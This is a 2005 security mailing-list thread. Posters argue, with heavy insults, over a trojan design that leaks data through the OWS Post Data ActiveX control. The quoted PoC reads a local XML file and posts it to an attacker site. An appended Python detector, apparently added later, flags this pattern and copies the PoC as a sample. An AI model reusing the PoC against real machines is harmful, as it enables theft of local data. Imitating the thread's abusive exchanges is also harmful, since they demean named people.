Message-ID: <d3a62f6f0512221006x6b2d2deck7e7b8c4c864e041e@mail.gmail.com>
Date: Thu Dec 22 18:06:58 2005
From: testdrive6 at gmail.com (Test Drive)
Subject: new attack technique? using
	JavaScript+XML+OWSPost Data

On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
>
> You surely must be a clone of Gaurav !! Ain't you ??
>
> name pipe [mailto:namepipe@...il.com] brazenly wrote:
> >> Before flaming others just look at urself.  wtf u do moron debasis ,
> sell nessus reports for 5K, without even removing false +ives ??
>
> lol !! Is that what you do ??
>

No u do that .. everone  knows abt it.

>> This is ur elite resume ->
> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
> Hacker ???? omfg.
>
> Certainly, like many others I was also one time looking for a good break
> and moreover I just wanted to have a web based copy on a security jobs
> site. I am glad that my resume made you laugh.
>

>> You trying to be next fadia or wat ?
>
> I never have to become like someone else.... I'm pretty much happy with my
> own identity.
>

>> Do you want me to post ur lame Firewall bypass vulnerabilities links
> which have been already founded  years before?
>
> Is that the one that one, which many securitysites released as an advisory
> including the vendor himself. Why you, infact I wud be glad to post it
> again.
> http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
>
> Also don't forget to refer those CVE, BID, FrSIRT, OSVDB, Secunia,
> Securiteam,  ISS X-Force, US-CERT reference link on my site. They might help
> you clarify your doubt.
>

Are u talking abt the WGA  check, which some1 posted abt 2 week ago.

>> Basically u are an asshole. So stfu.
>

*****STFU**** **

Is this statement phrased using both gaurav's and ur's l33t skils?? :P
>
> - D
>
>
>
>  ------------------------------
> *From:* name pipe [mailto:namepipe@...il.com]
> *Sent:* Thursday, December 22, 2005 10:54 PM
> *To:* Debasis Mohanty
> *Cc:* Gaurav Kumar; full-disclosure@...ts.grok.org.uk
> *Subject:* Re: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWSPost Data
>
> Before flaming others just look at urself.  wtf u do moron debasis , sell
> nessus reports for 5K, without even removing false +ives ??
> This is ur elite resume ->
> http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
> Hacker ???? omfg. You trying to be next fadia or wat ? Do you want me to
> post ur lame Firewall bypass vulnerabilities links which have been already
> founded  years before?
>
> Basically u are an asshole. So stfu.
>
> On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> >
> > Keep it up moron !!
> >
> > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> > > kidder than u)
> >
> > Shit !! Another several years ppl has to tolerate your stupidity till
> > you
> > actually _grow up_.
> >
> > > Tell me one thing, a Windows XP + Office XP + Internet explorer
> > > combination so rare ?
> >
> > Is this a new topic ?? I mean are you done with your firewall and some
> > weird trojan design :P
> >
> >
> > - D
> >
> >
> > -----Original Message-----
> > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of Gaurav
> > Kumar
> > Sent: Thursday, December 22, 2005 10:23 PM
> > To: Debasis Mohanty
> > Cc: full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] new attack technique? using
> > JavaScript+XML+OWSPost Data
> >
> > typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.
> >
> > On 12/22/05, Gaurav Kumar < gaurav@...urebox.org> wrote:
> > > oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> > > kidder than u)
> > >
> > > The _real_ thing is that I proved the point.
> > > U told win xp will give access denied error. I proved u wrong with the
> >
> > > proof attached.
> > > U told above technique wont work...i proved u wrong.
> > > > Tell me one thing, a Windows XP + Office XP + Internet explorer
> > > > combination so rare ?
> > >
> > > Is that all making ur ego shattered?
> > >
> > > > ...and u are no one to decide what should one discuss on this list.
> > >
> > > regards,
> > > gaurav
> > >
> > >
> > >
> > > On 12/22/05, Debasis Mohanty < mail@...kingspirits.com> wrote:
> > > > Kid,
> > > > > Although I normally don't reply to such frivolous and lame
> > > > > statements but your reply has seriously pissed me off.. So dropping
> > > > > few lines, perhaps will help you grow up !!
> > > >
> > > > -----Original Message-----
> > > > >> From: Gaurav Kumar brazenly wrote:
> > > >
> > > > >> Looks like u need to read again what i wrote. I didnt use the
> > > > >> word
> > > > 'spread'.
> > > >
> > > > I don't have to !! I can still remember your priceless statements
> > > > [1] + [2]
> > > > -
> > > >
> > > > [1] A Trojan has been to be placed in a system running an
> > > > application [1] firewall like Zone Alarm Pro etc.
> > > >
> > > > [2] The target system must be having office XP and the user has to
> > > > be [2] lured to view a webpage hosted by attacker.
> > > >
> > > >
> > > > ROFL !! May be you could just ask your l33t victim to send you his
> > > > passwords and other info by email :P Don't forget to send him your
> > > > l33t email ID - '@ securebox.org'
> > > >
> > > >
> > > > >> [3] Moreover, u need not know if the target system is running ZA
> > > > >> or
> > > > not...
> > > > >> [3] "the technique works even if firewall is not installed".
> > > >
> > > > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt
> > > > >> matter
> > > > is ZA
> > > > >> [4] or any other FW is running on client".
> > > >
> > > > > Looking at statement [3] & [4], (especially the statement within
> > > > > double
> > > > > quotes) just made me believe that you don't know what you are
> > > > > talking about unless you want to look like an idiot.
> > > >
> > > >
> > > > >> really? ever heard of IE exploits?
> > > >
> > > > Priceless !!
> > > >
> > > >
> > > > >> Well..Exactly! i would suggest u read the 'assumptions' first,
> > > > >> its an assumption that user will click yes to warning...like most
> > 'normal'
> > > > users do.
> > > >
> > > > Yet another priceless statement... Maybe you could just ask your
> > > > l33t victim to click 'yes' to your l33t piece of code trying to
> > > > download some l33t piece of shit which will fail to run and die like
> > an
> > idiot.
> > > >
> > > >
> > > > > I am sure you have enough l33t skills to strike back to keep your
> > > > > ego up2date however, I wud rather suggest if you have only your
> > > > > stupidity to share then feel free to take it offline and don't piss
> > > > > off everyone in this list. I would welcome you if you really want to
> > > > > strike back with some _serious_ technical stuff. (Note: make a note
> > > > > of _serious_ in the statement)
> > > >
> > > > - D
> > > >
> > > >
> > > >
> > > >
> > > > -----Original Message-----
> > > > From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of
> > > > Gaurav Kumar
> > > > Sent: Thursday, December 22, 2005 8:52 AM
> > > > To: Debasis Mohanty
> > > > Cc: full-disclosure@...ts.grok.org.uk; websecurity@...appsec.org
> > > > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack
> > technique?
> > > > using JavaScript+XML+OWSPost Data
> > > >
> > > > On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > > > > -----Original Message-----
> > > > > From: Gaurav Kumar
> > > > > Sent: Wednesday, December 21, 2005 8:59 PM
> > > > > To: full-disclosure@...ts.grok.org.uk
> > > > > Cc: websecurity@...appsec.org
> > > > > Subject: [Full-disclosure] new attack technique? using
> > > > > JavaScript+XML+OWSPost Data
> > > > >
> > > > > 1>> A Trojan has been to be placed in a system running an
> > > > > 1>> application firewall like Zone Alarm Pro etc.
> > > > >
> > > > > >> Assumptions:
> > > > >
> > > > > 2>> The target system must be having office XP and the user has to
> >
> > > > > 2>> be lured to view a webpage hosted by attacker.
> > > > >
> > > > > 3>> The Trojan can be designed to generate an xml file which will
> > > > > 3>> contain the data to be sent out. The attacker will lure
> > > > > the
> > > > > 3>> user to visit a website hosted by him.
> > > > >
> > > > > Lol !! In a practical scenario, the attacker who spreads the
> > > > > worm/trojans himself is not aware in the initial stage which are
> > > > > the infected machines unless the trojan sends back the
> > > > > machine/user info back to the attacker. Now as you have already
> > > > > mentioned ZA is running then no data can be sent back to the
> > > > > attacker. So the attacker is clueless
> > > > which are those infected machines.
> > > >
> > > > Looks like u need to read again what i wrote. I didnt use the word
> > 'spread'.
> > > > Moreover, u need not know if the target system is running ZA or
> > > > not...the technique works even if firewall is not installed. I am
> > > > discussing a possible 'design' of a trojan here, doesnt matter is ZA
> > > > or any other FW is running on client.
> > > >
> > > > > So the case of luring the user to visit the link is out of
> > scope...
> > > >
> > > > really? ever heard of IE exploits?
> > > >
> > > > >
> > > > > >> The site can have following HTML code-
> > > > >
> > > > > Now coming back to technical stuff, You are trying to access a
> > > > > local file which will only be allowed if the site is in "Trusted
> > > > > Sites" or "Local Intranet" or "Local Security Zone" and activex
> > not
> > marked safe.
> > > > > The fact that *the client is also the server* is irrelevant.
> > > > >
> > > > > > Try uploading the script to some webserver and give a html
> > > > > > extension; it will throw an _access denied_ error when the page
> > > > > > loads (even on Win XP + SP1).
> > > > > >
> > > > > > In case of any server side extension like *.asp, *.jsp etc, the
> > > > > > user will be prompted that a malicious component is trying to
> > > > > > load and ask for user permission.
> > > > >
> > > > >
> > > > > >> <html>
> > > > > >> <body>
> > > > > >> The author is not responsible for any misuse, this PoC is for
> > > > > >> educational purpose only.
> > > > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > > > >> id="exp">
> > > > > >> </object>
> > > > > >> <script LANGUAGE=javascript>
> > > > > >> var xmlDoc
> > > > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > > > >> xmlDoc.async=false ;
> > > > > >> xmlDoc.load("c:\\note.xml");
> > > > > >> xmlObj=xmlDoc.documentElement;
> > > > > >> var a= xmlObj.firstChild.text;
> > > > > >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > > > > >> </script>
> > > > > >> </body>
> > > > > >> </html>
> > > > >
> > > > >
> > > > > >> The above code (works well on windows XP SP2) essentially calls
> > > > > >> "OWS Post Data" COM control to post the contents of note.xml
> > > > > >> (generated by trojan) to attackersite.com
> > > > >
> > > > > IMHO, never conduct such tests in a "Intranet Zone" or "Local
> > Zone"
> > > > > and draw conclusion about "Internet Security Zone".
> > > > >
> > > > > You may also link to know about this issue -
> > > > > http://support.microsoft.com/kb/317244/EN-US/
> > > > >
> > > > >
> > > > > >>> Essentially, the technique is breaking the basic functionality
> > > > > >>> of application firewalls by using OWS Post Data as bridge for
> > > > > >>> sending out the data using Javascript and XML.
> > > > >
> > > > > Not Exactly !! I wud rather suggest you to do a little more
> > > > > research and draw any conclusion. Keep those _Security Zones_ in
> > > > > mind before you post anything...
> > > >
> > > > Well..Exactly! i would suggest u read the 'assumptions' first, its
> > > > an assumption that user will click yes to warning...like most
> > 'normal'
> > > > users do.
> > > > >
> > > > >
> > > > > - D
> > > >
> > > >
> > > >
> > >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051222/0075e00a/attachment-0001.html
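The thread argues about whether the posted PoC actually runs outside the Intranet/Trusted zone, but from a defender's side the more useful question is how to recognise the pattern at all: an `<object>` tag for the OWS Post Data control combined with a script that instantiates `Microsoft.XMLDOM`, loads a drive-letter path, and calls `.Post(`. The following is an added example written for this page, not code from the thread or from either poster; it is a stdlib-only Python content checker of the kind a mail gateway or web proxy could run over inbound HTML. The sample document it scans is constructed here to mirror the structure of the quoted PoC (the CLSID is the one from the thread; the URL is a placeholder, and the verdict thresholds are the author's own choice, not a standard).

```python
import re
from html.parser import HTMLParser

# CLSID of the "OWS Post Data" COM control named in the thread's PoC.
OWS_POST_DATA_CLSID = "BDEADE98-C265-11D0-BCED-00A0C90AB50F"

CLSID_RE = re.compile(r"\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?")
ACTIVEX_RE = re.compile(r"""new\s+ActiveXObject\s*\(\s*['"]([^'"]+)['"]\s*\)""", re.I)
LOAD_RE = re.compile(r"""\.load\s*\(\s*['"]([^'"]+)['"]\s*\)""", re.I)
POST_RE = re.compile(r"\.Post\s*\(")  # method name on the OWS control, case-sensitive


def is_local_path(p):
    """True for drive-letter paths (c:\\...) and file: URLs, i.e. reads the
    Internet zone is not supposed to allow."""
    return bool(re.match(r"^[A-Za-z]:[\\/]", p)) or p.lower().startswith("file:")


class ActiveXAuditor(HTMLParser):
    """Collects <object classid=...> CLSIDs and the text of every <script> block."""

    def __init__(self):
        super().__init__()
        self.clsids = []
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object":
            m = CLSID_RE.search(a.get("classid") or "")
            if m:
                self.clsids.append(m.group(1).upper())
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            self.scripts.append("".join(self._buf))
            self._buf = []


def audit_html(html):
    """Return a structured report plus a verdict: block / review / allow."""
    p = ActiveXAuditor()
    p.feed(html)
    p.close()
    report = {"ows_control": OWS_POST_DATA_CLSID in p.clsids,
              "activex": [], "local_loads": [], "post_call": False}
    for s in p.scripts:
        report["activex"] += [m.group(1) for m in ACTIVEX_RE.finditer(s)]
        report["local_loads"] += [m.group(1) for m in LOAD_RE.finditer(s)
                                  if is_local_path(m.group(1))]
        if POST_RE.search(s):
            report["post_call"] = True
    # Verdict thresholds are this example's own policy, not a vendor standard.
    if report["ows_control"] and (report["local_loads"] or report["post_call"]):
        report["verdict"] = "block"
    elif report["ows_control"] or report["activex"] or report["local_loads"]:
        report["verdict"] = "review"
    else:
        report["verdict"] = "allow"
    return report


# Constructed sample mirroring the quoted PoC; example.invalid is a placeholder host.
SAMPLE_POC = r'''<html><body>
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"></object>
<script LANGUAGE=javascript>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = false;
xmlDoc.load("c:\\note.xml");
var a = xmlDoc.documentElement.firstChild.text;
exp.Post(0, "http://example.invalid/input.asp", a);
</script></body></html>'''

# Constructed benign page for comparison.
SAMPLE_BENIGN = '<html><body><script>document.title = "hello";</script></body></html>'

if __name__ == "__main__":
    for name, doc in (("poc", SAMPLE_POC), ("benign", SAMPLE_BENIGN)):
        print(name, audit_html(doc))
```

The checker deliberately reports the pattern regardless of which IE security zone the page would land in: as the thread itself notes, the same markup is refused in the Internet zone and may succeed from Local Intranet or Trusted Sites, so a gateway cannot know the outcome and should flag the combination rather than guess.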
